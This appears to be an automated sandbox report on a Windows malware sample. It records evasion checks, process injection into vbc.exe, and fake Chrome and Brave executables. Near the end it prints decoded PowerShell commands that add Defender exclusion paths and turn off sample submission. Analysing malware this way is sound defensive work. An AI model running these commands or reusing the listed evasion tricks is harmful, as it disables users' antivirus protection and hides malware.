Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\GoogleUpdate.exe	RDTSC instruction interceptor: First address: 00000000032B4B4D second address: 00000000032B4B5C instructions: 0x00000000 rdtsc 0x00000002 movzx dx, bl 0x00000006 bswap eax 0x00000008 inc cl 0x0000000a setnle dh 0x0000000d xor bl, cl 0x0000000f rdtsc
Source: C:\Windows\GoogleUpdate.exe	RDTSC instruction interceptor: First address: 0000000002F8F2D0 second address: 0000000002F8F2DF instructions: 0x00000000 rdtsc 0x00000002 movzx dx, bl 0x00000006 bswap eax 0x00000008 inc cl 0x0000000a setnle dh 0x0000000d xor bl, cl 0x0000000f rdtsc
Source: C:\Windows\GoogleUpdate.exe	RDTSC instruction interceptor: First address: 00000000030DC131 second address: 00000000030DC135 instructions: 0x00000000 rdtsc 0x00000002 pop ebx 0x00000003 pop ecx 0x00000004 rdtsc

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Users\user\Desktop\6iWK0k820U.exe TID: 5804	Thread sleep count: 9999 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 636	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5660	Thread sleep count: 9255 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6132	Thread sleep count: 9593 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4648	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\ofg.exe TID: 4424	Thread sleep count: 2083 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe TID: 5428	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\ofg.exe TID: 5372	Thread sleep count: 264 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5796	Thread sleep count: 906 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 68	Thread sleep count: 9049 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5376	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Local\Google\chrome.exe TID: 5448	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1360	Thread sleep count: 9070 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1264	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\GoogleUpdate.exe TID: 5756	Thread sleep time: -2400000s >= -30000s
Source: C:\Users\user\AppData\Local\Google\chrome.exe TID: 4956	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 680	Thread sleep count: 333 > 30

Source: C:\Users\user\AppData\Local\Google\ofg.exe

Thread sleep count: Count: 2083 delay: -10

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\GoogleUpdate.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\6iWK0k820U.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_0-8777

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\GoogleUpdate.exe	Thread delayed: delay time: 300000

Source: C:\Users\user\Desktop\6iWK0k820U.exe	Window / User API: threadDelayed 9999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Window / User API: threadDelayed 9255	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9593	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Window / User API: threadDelayed 2083	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 906
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9049
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9070

Source: C:\Users\user\AppData\Local\Google\brave.exe

API coverage: 9.7 %

Source: C:\Users\user\AppData\Local\Google\brave.exe

Dropped PE file which has not been started: C:\Program Files\Google\Chrome\updater.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Thread delayed: delay time: 120000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\GoogleUpdate.exe	Thread delayed: delay time: 300000
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Thread delayed: delay time: 120000

Source: GoogleUpdate.exe, 00000035.00000002.584454560.00000000009B5000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000035.00000002.580799994.000000000095B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: vbc.exe, 00000002.00000002.378336664.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\6iWK0k820U.exe

0_2_004117EC

Source: C:\Users\user\Desktop\6iWK0k820U.exe

Code function: 0_2_0041B154 mov eax, dword ptr fs:[00000030h]

0_2_0041B154

Source: C:\Users\user\Desktop\6iWK0k820U.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\6iWK0k820U.exe

Code function: 0_2_0040AF5A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0040AF5A

Source: C:\Users\user\AppData\Local\Google\brave.exe

Code function: 14_2_00007FF6A600F6C0 GetLastError,FormatMessageA,IsDebuggerPresent,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,LocalFree,

14_2_00007FF6A600F6C0

Source: C:\Users\user\AppData\Local\Google\brave.exe

Code function: 14_2_00007FF6A60043C0 SHGetFolderPathW,GetFileSize,GetProcessHeap,HeapAlloc,RtlAllocateHeap,

14_2_00007FF6A60043C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: 0_2_00410C98 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	0_2_00410C98
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: 0_2_0040DD07 SetUnhandledExceptionFilter,	0_2_0040DD07
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: 0_2_0040AF5A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040AF5A
Source: C:\Users\user\Desktop\6iWK0k820U.exe	Code function: 0_2_0040D7B4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040D7B4
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 14_2_00007FF6A6001190 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,malloc,memcpy,_initterm,GetStartupInfoW,exit,	14_2_00007FF6A6001190

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Google\brave.exe

Section loaded: C:\Users\user\AppData\Local\Temp\85AD.tmp target: unknown protection: readonly

Jump to behavior

Encrypted powershell cmdline option found

Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @('C:\Users\Revelin', 'C:\Program Files') -Force
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: Base64 decoded Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @('C:\Users\Revelin', 'C:\Program Files') -Force
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @('C:\Users\Revelin', 'C:\Program Files') -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: Base64 decoded Set-MpPreference -SubmitSamplesConsent 2	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @('C:\Users\Revelin', 'C:\Program Files') -Force

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\6iWK0k820U.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write	Jump to behavior
